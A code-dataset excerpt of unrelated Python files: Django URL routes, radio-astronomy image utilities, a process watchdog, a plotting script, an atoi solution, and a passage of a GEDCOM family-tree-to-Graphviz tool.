url(r'^imprint/edit/(?P\\d+)/$', 'imprint_edit'),\n \n url(r'^about/$', 'about'),\n url(r'^contact/$', 'contact'),\n url(r'^dev/$', 'dev'),\n url(r'^jobs/$', 'jobs'),\n url(r'^privacy/$', 'privacy'),\n url(r'^terms/$', 'terms'),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n #url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n)\n\nif settings.DEBUG:\n urlpatterns += patterns('', (r'^media/(?P.*)$', 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}))","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"623392425","text":"\n\n#calss header\nclass _INSEMINATE():\n\tdef __init__(self,): \n\t\tself.name = \"INSEMINATE\"\n\t\tself.definitions = [u\"to put a male animal's sperm into a female animal, either by the sexual act or by an artificial method\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_inseminate.py","file_name":"_inseminate.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"497582352","text":"#\n\"\"\"\nFunctions that define and manipulate images. 
Images are just data and a World Coordinate System.\n\"\"\"\nimport copy\nimport logging\nimport warnings\nfrom astropy.wcs import FITSFixedWarning\nwarnings.simplefilter('ignore', FITSFixedWarning)\n\nimport numpy\n\nimport astropy.units as u\nfrom astropy.coordinates import SkyCoord\n\nfrom astropy.wcs import WCS\n\nfrom data_models.polarisation import PolarisationFrame\nfrom data_models.memory_data_models import Image\n\nfrom processing_library.fourier_transforms.convolutional_gridding import w_beam\nfrom processing_library.fourier_transforms.fft_support import ifft, fft\n\nlog = logging.getLogger(__name__)\n\n\ndef image_sizeof(im: Image):\n \"\"\" Return size in GB\n \"\"\"\n return im.size()\n\n\ndef create_image(npixel=512, cellsize=0.000015, polarisation_frame=PolarisationFrame(\"stokesI\"),\n frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]),\n phasecentre=None, nchan=None) -> Image:\n \"\"\"Create an empty template image consistent with the inputs.\n\n :param npixel: Number of pixels\n :param polarisation_frame: Polarisation frame (default PolarisationFrame(\"stokesI\"))\n :param cellsize: cellsize in radians\n :param frequency:\n :param channel_bandwidth: Channel width (Hz)\n :param phasecentre: phasecentre (SkyCoord)\n :return: Image\n\n \"\"\"\n \n if phasecentre is None:\n phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000')\n \n if polarisation_frame is None:\n polarisation_frame = PolarisationFrame(\"stokesI\")\n \n npol = polarisation_frame.npol\n if nchan is None:\n nchan = len(frequency)\n \n shape = [nchan, npol, npixel, npixel]\n w = WCS(naxis=4)\n # The negation in the longitude is needed by definition of RA, DEC\n w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]]\n w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0]\n w.wcs.ctype = [\"RA---SIN\", \"DEC--SIN\", 'STOKES', 'FREQ']\n w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]]\n w.naxis = 4\n w.wcs.radesys = 'ICRS'\n w.wcs.equinox = 2000.0\n \n return create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame)\n\n\ndef create_image_from_array(data: numpy.array, wcs: WCS, polarisation_frame: PolarisationFrame) -> Image:\n \"\"\" Create an image from an array and optional wcs\n \n The output image preserves a reference to the input array.\n\n :param data: Numpy.array\n :param wcs: World coordinate system\n :param polarisation_frame: Polarisation Frame\n :return: Image\n \n \"\"\"\n fim = Image()\n fim.polarisation_frame = polarisation_frame\n \n fim.data = data\n if wcs is None:\n fim.wcs = None\n else:\n fim.wcs = wcs.deepcopy()\n \n if image_sizeof(fim) >= 1.0:\n log.debug(\"create_image_from_array: created %s image of shape %s, size %.3f (GB)\" %\n (fim.data.dtype, str(fim.shape), image_sizeof(fim)))\n \n assert isinstance(fim, Image), \"Type is %s\" % type(fim)\n return fim\n\n\ndef polarisation_frame_from_wcs(wcs, shape) -> PolarisationFrame:\n \"\"\"Convert wcs to polarisation_frame\n\n See FITS definition in Table 29 of https://fits.gsfc.nasa.gov/standard40/fits_standard40draft1.pdf\n or subsequent revision\n\n 1 I Standard Stokes unpolarized\n 2 Q Standard Stokes linear\n 3 U Standard Stokes linear\n 4 V Standard Stokes circular\n −1 RR Right-right circular\n −2 LL Left-left circular\n −3 RL Right-left cross-circular\n −4 LR Left-right cross-circular\n −5 XX X parallel linear\n −6 YY Y parallel linear\n −7 XY XY cross linear\n −8 YX YX cross 
linear\n\n stokesI [1]\n stokesIQUV [1,2,3,4]\n circular [-1,-2,-3,-4]\n linear [-5,-6,-7,-8]\n\n \"\"\"\n # The third axis should be stokes:\n \n polarisation_frame = None\n \n if len(shape) == 2:\n polarisation_frame = PolarisationFrame(\"stokesI\")\n else:\n npol = shape[1]\n pol = wcs.sub(['stokes']).wcs_pix2world(range(npol), 0)[0]\n pol = numpy.array(pol, dtype='int')\n for key in PolarisationFrame.fits_codes.keys():\n keypol = numpy.array(PolarisationFrame.fits_codes[key])\n if numpy.array_equal(pol, keypol):\n polarisation_frame = PolarisationFrame(key)\n return polarisation_frame\n if polarisation_frame is None:\n raise ValueError(\"Cannot determine polarisation code\")\n \n assert isinstance(polarisation_frame, PolarisationFrame)\n return polarisation_frame\n\n\ndef checkwcs(wcs1, wcs2):\n \"\"\" Check for compatbility of wcs\n \n :param wcs1:\n :param wcs2:\n \"\"\"\n pass\n # No confidence in this next test\n # assert wcs1.wcs.compare(wcs2.wcs, cmp=1 | 2 | 4), \"WCS's do not agree\"\n\n\ndef convert_image_to_kernel(im: Image, oversampling, kernelwidth):\n \"\"\" Convert an image to a griddata kernel\n \n :param im: Image to be converted\n :param oversampling: Oversampling of Image spatially\n :param kernelwidth: Kernel width to be extracted\n :return: numpy.ndarray[nchan, npol, oversampling, oversampling, kernelwidth, kernelwidth]\n \"\"\"\n naxis = len(im.shape)\n assert naxis == 4\n \n assert numpy.max(numpy.abs(im.data)) > 0.0, \"Image is empty\"\n \n nchan, npol, ny, nx = im.shape\n assert nx % oversampling == 0, \"Oversampling must be even\"\n assert ny % oversampling == 0, \"Oversampling must be even\"\n \n assert kernelwidth < nx and kernelwidth < ny, \"Specified kernel width %d too large\"\n \n assert im.wcs.wcs.ctype[0] == 'UU', 'Axis type %s inappropriate for construction of kernel' % im.wcs.wcs.ctype[0]\n assert im.wcs.wcs.ctype[1] == 'VV', 'Axis type %s inappropriate for construction of kernel' % im.wcs.wcs.ctype[1]\n newwcs = WCS(naxis=naxis + 2)\n for axis in range(2):\n newwcs.wcs.ctype[axis] = im.wcs.wcs.ctype[axis]\n newwcs.wcs.crpix[axis] = kernelwidth // 2\n newwcs.wcs.crval[axis] = 0.0\n newwcs.wcs.cdelt[axis] = im.wcs.wcs.cdelt[axis] * oversampling\n \n newwcs.wcs.ctype[axis + 2] = im.wcs.wcs.ctype[axis]\n newwcs.wcs.crpix[axis + 2] = oversampling // 2\n newwcs.wcs.crval[axis + 2] = 0.0\n newwcs.wcs.cdelt[axis + 2] = im.wcs.wcs.cdelt[axis]\n \n # Now do Stokes and Frequency\n newwcs.wcs.ctype[axis + 4] = im.wcs.wcs.ctype[axis + 2]\n newwcs.wcs.crpix[axis + 4] = im.wcs.wcs.crpix[axis + 2]\n newwcs.wcs.crval[axis + 4] = im.wcs.wcs.crval[axis + 2]\n newwcs.wcs.cdelt[axis + 4] = im.wcs.wcs.cdelt[axis + 2]\n \n newdata_shape = [nchan, npol, oversampling, oversampling, kernelwidth, kernelwidth]\n\n newdata = numpy.zeros(newdata_shape, dtype=im.data.dtype)\n \n assert oversampling * kernelwidth < ny\n assert oversampling * kernelwidth < nx\n \n ystart = ny // 2 - oversampling * kernelwidth // 2\n xstart = nx // 2 - oversampling * kernelwidth // 2\n yend = ny // 2 + oversampling * kernelwidth // 2\n xend = nx // 2 + oversampling * kernelwidth // 2\n for chan in range(nchan):\n for pol in range(npol):\n for y in range(oversampling):\n slicey = slice(yend + y, ystart + y, -oversampling)\n for x in range(oversampling):\n slicex = slice(xend + x, xstart + x, -oversampling)\n newdata[chan, pol, y, x, ...] 
= im.data[chan, pol, slicey, slicex]\n \n return create_image_from_array(newdata, newwcs, polarisation_frame=im.polarisation_frame)\n\n\ndef copy_image(im: Image):\n \"\"\" Create an image from an array\n \n Performs deepcopy of data_models, breaking reference semantics\n\n :param im:\n :return: Image\n \n \"\"\"\n \n if im is None:\n return im\n \n assert isinstance(im, Image), im\n fim = Image()\n fim.polarisation_frame = im.polarisation_frame\n fim.data = copy.deepcopy(im.data)\n if im.wcs is None:\n fim.wcs = None\n else:\n fim.wcs = copy.deepcopy(im.wcs)\n if image_sizeof(fim) >= 1.0:\n log.debug(\"copy_image: copied %s image of shape %s, size %.3f (GB)\" %\n (fim.data.dtype, str(fim.shape), image_sizeof(fim)))\n assert type(fim) == Image\n return fim\n\n\ndef create_empty_image_like(im: Image) -> Image:\n \"\"\" Create an empty image like another in shape and wcs\n\n :param im:\n :return: Image\n \n \"\"\"\n assert isinstance(im, Image), im\n fim = Image()\n fim.polarisation_frame = im.polarisation_frame\n fim.data = numpy.zeros_like(im.data)\n if im.wcs is None:\n fim.wcs = None\n else:\n fim.wcs = copy.deepcopy(im.wcs)\n if image_sizeof(im) >= 1.0:\n log.debug(\"create_empty_image_like: created %s image of shape %s, size %.3f (GB)\" %\n (fim.data.dtype, str(fim.shape), image_sizeof(fim)))\n assert isinstance(fim, Image), \"Type is %s\" % type(fim)\n return fim\n\n\ndef fft_image(im, template_image=None):\n \"\"\" FFT an image, transform WCS as well\n \n Prefer to use axes 'UU---SIN' and 'VV---SIN' but astropy will not accept.\n \n :param im:\n :param template_image:\n :return:\n \"\"\"\n assert len(im.shape) == 4\n d2r = numpy.pi / 180.0\n ft_wcs = copy.deepcopy(im.wcs)\n ft_shape = im.shape\n if im.wcs.wcs.ctype[0] == 'RA---SIN' and im.wcs.wcs.ctype[1] == 'DEC--SIN':\n ft_wcs.wcs.axis_types[0] = 0\n ft_wcs.wcs.axis_types[1] = 0\n ft_wcs.wcs.crval[0] = 0.0\n ft_wcs.wcs.crval[1] = 0.0\n ft_wcs.wcs.crpix[0] = ft_shape[3] // 2 + 1\n ft_wcs.wcs.crpix[1] = ft_shape[2] // 2 + 1\n ft_wcs.wcs.ctype[0] = 'UU'\n ft_wcs.wcs.ctype[1] = 'VV'\n ft_wcs.wcs.cdelt[0] = 1.0 / (ft_shape[3] * d2r * im.wcs.wcs.cdelt[0])\n ft_wcs.wcs.cdelt[1] = 1.0 / (ft_shape[2] * d2r * im.wcs.wcs.cdelt[1])\n ft_data = ifft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n elif im.wcs.wcs.ctype[0] == 'UU' and im.wcs.wcs.ctype[1] == 'VV':\n ft_wcs.wcs.crval[0] = template_image.wcs.wcs.crval[0]\n ft_wcs.wcs.crval[1] = template_image.wcs.wcs.crval[1]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[0]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[1]\n ft_wcs.wcs.ctype[0] = template_image.wcs.wcs.ctype[0]\n ft_wcs.wcs.ctype[1] = template_image.wcs.wcs.ctype[1]\n ft_wcs.wcs.cdelt[0] = template_image.wcs.wcs.cdelt[0]\n ft_wcs.wcs.cdelt[1] = template_image.wcs.wcs.cdelt[1]\n ft_data = fft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n elif im.wcs.wcs.ctype[0] == 'XX' and im.wcs.wcs.ctype[1] == 'YY':\n ft_wcs.wcs.axis_types[0] = 0\n ft_wcs.wcs.axis_types[1] = 0\n ft_wcs.wcs.crval[0] = 0.0\n ft_wcs.wcs.crval[1] = 0.0\n ft_wcs.wcs.crpix[0] = ft_shape[3] // 2 + 1\n ft_wcs.wcs.crpix[1] = ft_shape[2] // 2 + 1\n ft_wcs.wcs.ctype[0] = 'KX'\n ft_wcs.wcs.ctype[1] = 'KY'\n ft_wcs.wcs.cdelt[0] = 1.0 / (ft_shape[3] * im.wcs.wcs.cdelt[0])\n ft_wcs.wcs.cdelt[1] = 1.0 / (ft_shape[2] * im.wcs.wcs.cdelt[1])\n ft_data = ifft(im.data.astype('complex'))\n return 
create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n elif im.wcs.wcs.ctype[0] == 'KX' and im.wcs.wcs.ctype[1] == 'KY':\n ft_wcs.wcs.crval[0] = template_image.wcs.wcs.crval[0]\n ft_wcs.wcs.crval[1] = template_image.wcs.wcs.crval[1]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[0]\n ft_wcs.wcs.crpix[0] = template_image.wcs.wcs.crpix[1]\n ft_wcs.wcs.ctype[0] = template_image.wcs.wcs.ctype[0]\n ft_wcs.wcs.ctype[1] = template_image.wcs.wcs.ctype[1]\n ft_wcs.wcs.cdelt[0] = template_image.wcs.wcs.cdelt[0]\n ft_wcs.wcs.cdelt[1] = template_image.wcs.wcs.cdelt[1]\n ft_data = fft(im.data.astype('complex'))\n return create_image_from_array(ft_data, wcs=ft_wcs, polarisation_frame=im.polarisation_frame)\n\n else:\n raise NotImplementedError(\"Cannot FFT specified axes\")\n\n\ndef pad_image(im: Image, shape):\n \"\"\"Pad an image to desired shape\n \n The wcs crpix is adjusted appropriately\n \n :param im:\n :param shape:\n :return:\n \"\"\"\n if im.shape == shape:\n return im\n else:\n newwcs = copy.deepcopy(im.wcs)\n newwcs.wcs.crpix[0] = im.wcs.wcs.crpix[0] + shape[3] // 2 - im.shape[3] // 2\n newwcs.wcs.crpix[1] = im.wcs.wcs.crpix[1] + shape[2] // 2 - im.shape[2] // 2\n \n for axis, _ in enumerate(im.shape):\n if shape[axis] < im.shape[axis]:\n raise ValueError(\"Padded shape %s is smaller than input shape %s\" % (shape, im.shape))\n \n newdata = numpy.zeros(shape, dtype=im.data.dtype)\n ystart = shape[2] // 2 - im.shape[2] // 2\n yend = ystart + im.shape[2]\n xstart = shape[3] // 2 - im.shape[3] // 2\n xend = xstart + im.shape[3]\n newdata[..., ystart:yend, xstart:xend] = im.data[...]\n return create_image_from_array(newdata, newwcs, polarisation_frame=im.polarisation_frame)\n\n\ndef create_w_term_like(im: Image, w, phasecentre=None, remove_shift=False, dopol=False) -> Image:\n \"\"\"Create an image with a w term phase term in it:\n \n .. math::\n\n I(l,m) = e^{-2 \\\\pi j (w(\\\\sqrt{1-l^2-m^2}-1)}\n\n \n The vis phasecentre is used as the delay centre for the w term (i.e. where n==0)\n\n :param phasecentre:\n :param im: template image\n :param w: w value to evaluate (default is median abs)\n :param remove_shift:\n :param dopol: Do screen in polarisation?\n :return: Image\n \"\"\"\n \n fim_shape = list(im.shape)\n if not dopol:\n fim_shape[1] = 1\n \n fim_array = numpy.zeros(fim_shape, dtype='complex')\n fim = create_image_from_array(fim_array, wcs=im.wcs, polarisation_frame=im.polarisation_frame)\n \n cellsize = abs(fim.wcs.wcs.cdelt[0]) * numpy.pi / 180.0\n nchan, npol, _, npixel = fim_shape\n if phasecentre is SkyCoord:\n wcentre = phasecentre.to_pixel(im.wcs, origin=0)\n else:\n wcentre = [im.wcs.wcs.crpix[0] - 1.0, im.wcs.wcs.crpix[1] - 1.0]\n \n for chan in range(nchan):\n for pol in range(npol):\n fim.data[chan, pol, ...] 
= w_beam(npixel, npixel * cellsize, w=w, cx=wcentre[0],\n cy=wcentre[1], remove_shift=remove_shift)\n fov = npixel * cellsize\n fresnel = numpy.abs(w) * (0.5 * fov) ** 2\n log.debug('create_w_term_image: For w = %.1f, field of view = %.6f, Fresnel number = %.2f' % (w, fov, fresnel))\n \n return fim\n","sub_path":"processing_library/image/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":14835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"532169322","text":"import os\nimport psutil\nimport time\nimport json\nfrom common.send_mail import Send_Mail\n\nf=open(\"/data/pid/pid.txt\",\"r\")\ntoday={}\nline = f.read()\nline_dict = json.loads(line)\ntoday.update(line_dict)\nf.close()\n\nwhile True:\n pids=psutil.pids()\n if int(today[\"main.py\"]) in pids:\n time.sleep(10*60)\n else:\n Send_Mail().send_error_mail()\n break\n","sub_path":"check_if_run.py","file_name":"check_if_run.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"572702230","text":"import icon as icon\nimport matplotlib.pyplot as plt\n\nrkind = 'property'\nsim = icon.sim(25,250,0.9,-1,rkind)\nfig, (ax,bx) = plt.subplots(nrows=1, ncols=2)\nfig.set_facecolor(\"#ffffff\")\n\nax.set_title(\"Homogeneous\")\nax.set_xlabel(\"Revenues\")\nax.hist(icon.revenues(sim['ho']['firms'],rkind))\nbx.set_title(\"Heterogeneous\")\nbx.set_xlabel(\"Revenues\")\nbx.hist(icon.revenues(sim['he']['firms'],rkind))\n\n\nplt.show()","sub_path":"draw_hist_sim.py","file_name":"draw_hist_sim.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"641462491","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n INT_MAX = 2147483647\n INT_MIN = -2147483648\n if not str: return 0\n ans = 0\n sign = 1\n for i in range(len(str)):\n if str[i] != ' ': break\n str = str[i:]\n if not str: return 0\n if str[0] == '-':\n sign = -1\n str = str[1:]\n elif str[0] == '+': str = str[1:]\n for i in range(len(str)):\n if '0' <= str[i] <= '9': \n ans = ans*10 + int(str[i])\n else: break\n ans = ans*sign\n if ans > INT_MAX: return INT_MAX\n if ans < INT_MIN: return INT_MIN\n return ans\n\nif __name__ == '__main__':\n sol = Solution()\n print(sol.myAtoi('-1'))\n","sub_path":"Algorithms/8 String to Integer (atoi)/String to Integer (atoi).py","file_name":"String to Integer (atoi).py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"311318619","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
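An aside on the `check_if_run.py` watchdog above: it re-reads `psutil.pids()` every ten minutes and tests membership, but psutil exposes `psutil.pid_exists()` for exactly this check. A hedged, self-contained variant — the pid-file path, key, and alert hook are stand-ins for the originals:

```python
# Self-contained variant of the watchdog above; psutil.pid_exists() replaces
# the pids() membership scan. The pid-file path, key and alert hook are
# stand-ins for the originals.
import json
import time
import psutil

def watch(pid_file="/data/pid/pid.txt", key="main.py", interval=600):
    with open(pid_file) as f:
        pid = int(json.load(f)[key])
    while psutil.pid_exists(pid):
        time.sleep(interval)
    print("pid %d has exited -- an alert mail would be sent here" % pid)
```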
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\nimport time\nimport os\nimport sys\nimport configparser\nimport codecs\nfrom functools import cmp_to_key\nfrom typing import Any\nfrom typing import BinaryIO\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import TextIO\nfrom typing import Tuple\nfrom typing import cast\n\n\n# Protocols\n\nclass Renderable:\n # pylint: disable=no-self-use\n def render(self, _out: TextIO) -> None:\n ...\n\n\n# Exceptions\n\nclass NoSuchFamilyException(Exception):\n pass\n\n\nclass NoSuchIndividualException(Exception):\n pass\n\n\n# Model\n\nclass Individual:\n placeholderDir = os.path.dirname(os.path.realpath(__file__))\n \"\"\"An individual is our basic building block, can be part of multiple families (usually two).\"\"\"\n def __init__(self, model: 'Model') -> None:\n self.model = model\n self.iid = \"\"\n self.sex = None # type: Optional[str]\n self.forename = \"\" # John\n self.surname = \"\" # Smith\n self.famc = None # type: Any # str or Family\n self.fams = None # type: Any # str or Family\n self.birt = \"\"\n self.deat = \"\"\n # Horizontal order is ensured by order deps. Any order dep starting from this node?\n # Set to true on first addition, so that we can avoid redundant deps.\n\n def __str__(self) -> str:\n return \"iid: %s, sex: %s, forename: %s, surname: %s: famc: %s, fams: %s, birt: %s, deat: %s\" % (self.iid, self.sex, self.forename, self.surname, self.famc, self.fams, self.birt, self.deat)\n\n def resolve(self) -> None:\n \"\"\"Replaces family reference strings with references to objects.\"\"\"\n self.famc = self.model.get_family(self.famc)\n self.fams = self.model.get_family(self.fams)\n\n def get_full_name(self) -> str:\n \"\"\"Full name of the individual. Only used as comments in the output\n file to ease debugging.\"\"\"\n return \"%s %s\" % (self.forename, self.surname)\n\n def get_label(self) -> str:\n if self.forename:\n forename = self.forename\n else:\n forename = \"\"\n if self.surname:\n surname = self.surname\n else:\n surname = \"\"\n\n if self.model.config.imageFormatCase.lower() == 'lower':\n forename = forename.lower()\n surname = surname.lower()\n elif self.model.config.imageFormatCase.lower() == 'upper':\n forename = forename.upper()\n surname = surname.upper()\n\n path = self.model.config.imageFormat % {\n 'forename': forename,\n 'surname': surname,\n 'gwIndex': self.model.get_individual_gene_web_index(self.iid, self.forename, self.surname),\n 'birt': self.birt\n }\n\n if self.model.config.imageFormatGeneweb:\n import unicodedata\n path = unicodedata.normalize('NFKD', path).encode('ascii', 'ignore').decode('ascii')\n path = path.translate(dict({ord(\"-\"): \"_\"}))\n\n try:\n fullpath = os.path.join(self.model.basedir, path)\n except (UnicodeDecodeError) as ude:\n sys.stderr.write(\"Wrong encoding? 
%s\\n\" % str(ude))\n fullpath = \"\"\n if os.path.exists(fullpath) and not self.model.config.anonMode:\n picture = fullpath\n else:\n if self.sex:\n sex = self.sex.lower()\n else:\n sex = 'u'\n picture = os.path.join(Individual.placeholderDir, \"placeholder-%s.png\" % sex)\n\n try:\n from PIL import Image # type: ignore # No library stub file for module\n i = Image.open(picture)\n if i.size != (100, 100):\n picture = \"%s.tumbnail.png\" % picture\n if not os.path.exists(picture):\n sys.stderr.write(\"// Scaling picture of %s as it didn't have 100x100 px\\n\" % self.get_full_name())\n i.thumbnail((100, 100), Image.ANTIALIAS)\n i.save(picture, \"PNG\")\n i.close()\n except ImportError:\n pass\n\n format_string = \"\"\n if self.model.config.images:\n format_string = self.model.config.nodeLabelImage\n else:\n format_string = self.model.config.nodeLabelPlain\n if self.model.config.anonMode:\n birt = self.birt\n if len(birt) > 1:\n birt = \"YYYY\"\n deat = self.deat\n if len(deat) > 1:\n deat = \"YYYY\"\n return format_string % {\n 'picture': picture,\n 'surname': self.iid[0],\n 'forename': self.iid[1:],\n 'birt': birt,\n 'deat': deat\n }\n return format_string % {\n 'picture': picture,\n 'surname': surname,\n 'forename': forename,\n 'birt': self.birt,\n 'deat': self.deat\n }\n\n def get_color(self) -> str:\n if self.sex is None:\n sex = 'U'\n else:\n sex = self.sex.upper()\n return {'M': 'blue', 'F': 'pink', 'U': 'black'}[sex]\n\n def get_node(self) -> 'Node':\n return Node(self.iid, '[ shape = box,\\nlabel = %s,\\ncolor = %s,\\npenwidth=%s ]' % (self.get_label(), self.get_color(), self.model.config.nodeBorderWidth))\n\n def set_birt(self, birt: str) -> None:\n if not birt:\n return\n self.birt = birt\n try:\n if time.localtime().tm_year - int(birt) > self.model.config.considerAgeDead:\n if not self.deat:\n self.deat = \"?\"\n except ValueError:\n pass\n\n\nclass Family:\n \"\"\"Family has exactly one wife and husb, 0..* children.\"\"\"\n phCount = 0\n\n def __init__(self, model: 'Model') -> None:\n self.model = model\n self.fid = None # type: Optional[str]\n self.husb = None # type: Any # str or Individual\n self.wife = None # type: Any # str or Individual\n self.chil = [] # type: List[str]\n self.depth = 0\n\n def __str__(self) -> str:\n return \"fid: %s, husb: %s, wife: %s, chil: %s, depth: %s\" % (self.fid, self.husb, self.wife, self.chil, self.depth)\n\n def resolve(self) -> None:\n \"\"\"Replaces individual reference strings with references to objects.\"\"\"\n self.husb = self.model.get_individual(self.husb)\n self.wife = self.model.get_individual(self.wife)\n\n def sort_children(self, filtered_families: List['Family']) -> None:\n \"\"\"Sort children, based on filtered families of the layout.\"\"\"\n def compare_children(x_str: str, y_str: str) -> int:\n # For now just try to produce a traditional \"husb left, wife right\"\n # order, ignore birth date.\n x_obj = self.model.get_individual(x_str)\n if not x_obj:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % x_str)\n\n y_obj = self.model.get_individual(y_str)\n if not y_obj:\n raise NoSuchIndividualException(\"Can't find individual '%s' in the input file.\" % y_str)\n\n if x_obj.sex == \"M\" and x_obj.fams and self.model.get_family(x_obj.fams.fid, filtered_families):\n return 1\n if y_obj.sex == \"M\" and y_obj.fams and self.model.get_family(y_obj.fams.fid, filtered_families):\n return -1\n if x_obj.sex == \"F\" and x_obj.fams and self.model.get_family(x_obj.fams.fid, filtered_families):\n return -1\n 
if y_obj.sex == \"F\" and y_obj.fams and self.model.get_family(y_obj.fams.fid, filtered_families):\n return 1\n return 0\n self.chil.sort(key=cmp_to_key(compare_children))\n\n def get_husb(self) -> Individual:\n \"\"\"Same as accessing 'husb' directly, except that in case that would be\n None, a placeholder individual is created.\"\"\"\n if not self.husb:\n self.husb = Individual(self.model)\n self.husb.iid = \"PH%d\" % Family.phCount\n Family.phCount += 1\n self.husb.sex = 'M'\n self.husb.forename = \"?\"\n self.husb.surname = \"\"\n self.model.individuals.append(self.husb)\n assert isinstance(self.husb, Individual)\n return self.husb\n\n def get_wife(self) -> Individual:\n \"\"\"Same as get_husb(), but for wifes.\"\"\"\n if not self.wife:\n self.wife = Individual(self.model)\n self.wife.iid = \"PH%d\" % Family.phCount\n Family.phCount += 1\n self.wife.sex = 'F'\n self.wife.forename = \"?\"\n self.wife.surname = \"\"\n self.model.individuals.append(self.wife)\n assert isinstance(self.wife, Individual)\n return self.wife\n\n\nclass Model:\n def __init__(self, config: 'Config') -> None:\n self.config = config\n # List of all individuals.\n self.individuals = [] # type: List[Individual]\n # List of all families.\n self.families = [] # type: List[Family]\n self.basedir = \"\"\n\n def get_individual(self, id_string: str) -> Optional[Individual]:\n for i in self.individuals:\n if i.iid == id_string:\n return i\n return None\n\n def get_individual_gene_web_index(self, search_id: str, forename: str, surname: str) -> int:\n my_list = []\n for i in self.individuals:\n if (i.forename == forename) and (i.surname == surname):\n my_list.append(i.iid)\n my_list.sort()\n return my_list.index(search_id)\n\n def get_family(self, id_string: str, family_set: Optional[List[Family]] = None) -> Optional[Family]:\n if family_set:\n families = family_set\n else:\n families = self.families\n for i in families:\n if i.fid == id_string:\n return i\n return None\n\n def load(self, name: str) -> None:\n self.basedir = os.path.dirname(name)\n inf = open(name, \"rb\")\n GedcomImport(inf, self).load()\n inf.close()\n for individual in self.individuals:\n individual.resolve()\n for family in self.families:\n family.resolve()\n\n def save(self, out: Optional[TextIO]) -> None:\n \"\"\"Save is done by calcularing and rendering the layout on the output.\"\"\"\n if not out:\n out = sys.stdout\n\n # Support multiple layouts.\n layout_name = \"Layout\"\n if self.config.layout:\n layout_name = self.config.layout + layout_name\n layout = globals()[layout_name](self, out)\n else:\n layout = Layout(self, out)\n\n layout.calc()\n layout.render()\n\n @staticmethod\n def escape(string: str) -> str:\n return string.replace(\"-\", \"_\")\n\n\n# Layout (view)\n\nclass Edge(Renderable):\n \"\"\"A graph edge.\"\"\"\n def __init__(self, model: Model, from_node: str, to_node: str, invisible: bool = False, comment: Optional[str] = None) -> None:\n self.from_node = from_node\n self.to_node = to_node\n self.rest = \"\"\n if invisible:\n if model.config.edgeInvisibleRed:\n self.rest += \"[ color = red ]\"\n else:\n self.rest += \"[ style = invis ]\"\n else:\n if not model.config.edgeVisibleDirected:\n self.rest += \"[ arrowhead = none ]\"\n if comment:\n self.rest += \"// %s\" % comment\n\n def render(self, out: TextIO) -> None:\n out.write(\"%s -> %s %s\\n\" % (self.from_node, self.to_node, self.rest))\n\n\nclass Node(Renderable):\n \"\"\"A graph node.\"\"\"\n def __init__(self, id_string: str, rest: str = \"\", point: bool = False, 
visiblePoint: bool = False, comment: str = \"\") -> None:\n self.node_id = id_string\n self.rest = rest\n if point:\n self.rest += \"[ shape = point, width = 0 ]\"\n elif visiblePoint:\n self.rest += \"[ shape = point ]\"\n if comment:\n self.rest += \" // %s\" % comment\n\n def render(self, out: TextIO) -> None:\n out.write(\"%s %s\\n\" % (self.node_id, self.rest))\n\n\nclass Subgraph:\n \"\"\"A subgraph in the layout, contains edges and nodes.\n The special start node is not part of the elements list and it is at the\n begining. The special end node is the separator between elements what are\n in the subgraph and what are outside of it.\"\"\"\n\n class Start:\n \"\"\"Special start node that acts like a node/edge.\"\"\"\n def __init__(self, name: str) -> None:\n self.name = name\n\n def render(self, out: TextIO) -> None:\n out.write(\"subgraph %s {\\n\" % self.name)\n out.write(\"rank = same\\n\")\n\n class End(Renderable):\n \"\"\"Special end node that acts like a node/edge.\"\"\"\n def render(self, out: TextIO) -> None:\n out.write(\"}\\n\")\n\n def __init__(self, name: str, model: Model) -> None:\n self.name = name\n self.model = model\n self.elements = [] # type: List[Renderable]\n self.start = 